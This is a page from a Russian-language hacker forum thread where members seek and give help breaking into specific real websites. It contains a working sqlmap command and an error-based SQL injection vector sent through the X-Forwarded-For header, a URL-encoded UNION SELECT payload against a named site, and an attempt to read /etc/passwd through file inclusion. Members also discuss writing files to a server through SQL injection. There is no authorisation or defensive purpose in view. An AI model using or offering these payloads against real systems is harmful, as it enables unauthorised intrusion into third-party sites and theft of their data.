Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    вероятно есть скуля в форме регистрации, скидывай ссылку)
     
  2. Hassle

    Hassle New Member

    Joined:
    12 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ссылка на сам сайт: http://payeer-surf.ru/
    сами ошибки с описанием) в CSS детали атаки схожи между вариантами, а в SQL инъекции везде одинаковое описание) как такое пробивается?
     
    #202 Hassle, 13 Jun 2015
    Last edited: 13 Jun 2015
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    да, уязвимость в заголовке X-Forwarded-For
     
    _________________________
  4. Hassle

    Hassle New Member

    Joined:
    12 Jun 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    это да, вижу) только я не знаю каким боком подойти, чтоб вывелось как url, для использования к примеру sqlmap
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Смотри в сторону –level
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    в sqlmap она не заведется. хотя правильный синтаксис такой:
    Code:
    sqlmap -u "http://payeer-surf.ru/" --headers="X-Forwarded-For: *" --dbs
    проблема в том, что ошибка появляется при подстановке одинарной и двойной кавычки, пока не понял, почему так.
    т. е.
    Code:
    X-Forwarded-For: 10.67.90.16"'
     
    _________________________
    Hassle likes this.
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    конечный вектор:
    Code:
    10.67.90.16"'and(extractvalue(1,concat(0x3a,version())))='1
     
    _________________________
    kingbeef and Hassle like this.
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Здравствуйте !
    PHP:
    http://www.avizinfo.com.ua/templates/js.php?files=/etc/passwd&side=front 
    можно тут что-то придумать?
    При запросе /proc/self/environ . выдаётся страница с текстом pool www . Так же и на другие логи. Почему не инклудится index?
    PHP:
    http://kafa-info.com.ua/vh/index.php?pid=\
    HTML:
     http://papajohn.com.ua/ajax/catalog-change/?add=1&model_id=3
    fucking day
    как тут раскручивать ? Что-то я не догоняю. заранее спасибо )
     
    #208 BabaDook, 14 Jun 2015
    Last edited by a moderator: 15 Jun 2015
  9. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    по papajohn.com.ua это просто лог с ошибкой запроса, параметры в нем не участвуют.
    kafa-info.com.ua: я не понял откуда ноги растут там, ничего не скажу
    avizinfo.com.ua: по-моему там не инклуд, а просто читалка. не уверен, особо не смотрел
     
    _________________________
    #209 yarbabin, 15 Jun 2015
    Last edited by a moderator: 15 Jun 2015
    BabaDook likes this.
  10. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    День добрый. Нашел скулю и по традиции всегда начинаю смотреть права.
    File-priv=Y.
    Отлично, далее смотрю отсчет акунетикса, написано Application Error Mesage, там давала ошибку с раскрытием пути функция отвечающая за шифрование пароля в md5. Поставил в sqlmap, и получал еррор, директория недоступна для записи. Потом я еще нашел phpinfo, попробовал подставлять пути из него и снова облом, даже в темповскую директорию ничего не грузит.
    Payload:
    [​IMG]
    Не пойму почему так происходит, я в раскрутке скуль далеко не проф, разве что UNION инъекцию раскрутить смогу. Почему-то файлы читать читаются, а чего-нибудь загрузить так нет. Еще в логах sqlmap'а нет привычного мне INTO OUTFILE метода, только LINES TERMINATED BY.
    Что полезного можно из этого извлечь?
    P.S Посмотри пароль от БД и зайди, через phpmyadmin например, не катит. Нет ни phpmyadmin'а, ни пароля..
     
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    mq off?
    full url encode
     
    _________________________
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Например? у меня не получилось...
     
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    www.trial-ch.org/trialwatch/tw_map_coord.php?Lang=en&CF=&JF=11+%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31--+
     
    _________________________
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    А вывод можно как нибудь организовать?
     
  16. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Да, на magic_quotes везде оффы стоят
     
  17. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    _________________________
    yarbabin likes this.
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    где там ошибка? у вас там инклуд рядом, не хотите с ним что-нибудь придумать? правда там open_basedir()
    Code:
    http://www.trial-ch.org/trialwatch/tw_map_coord.php?Lang=lol
     
    _________________________
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Видел, но с ним не чё не сделать(
    Ошибка mysql_fetch_array() expects parameter 1 to be resource
    Можно как нить вывод замутить?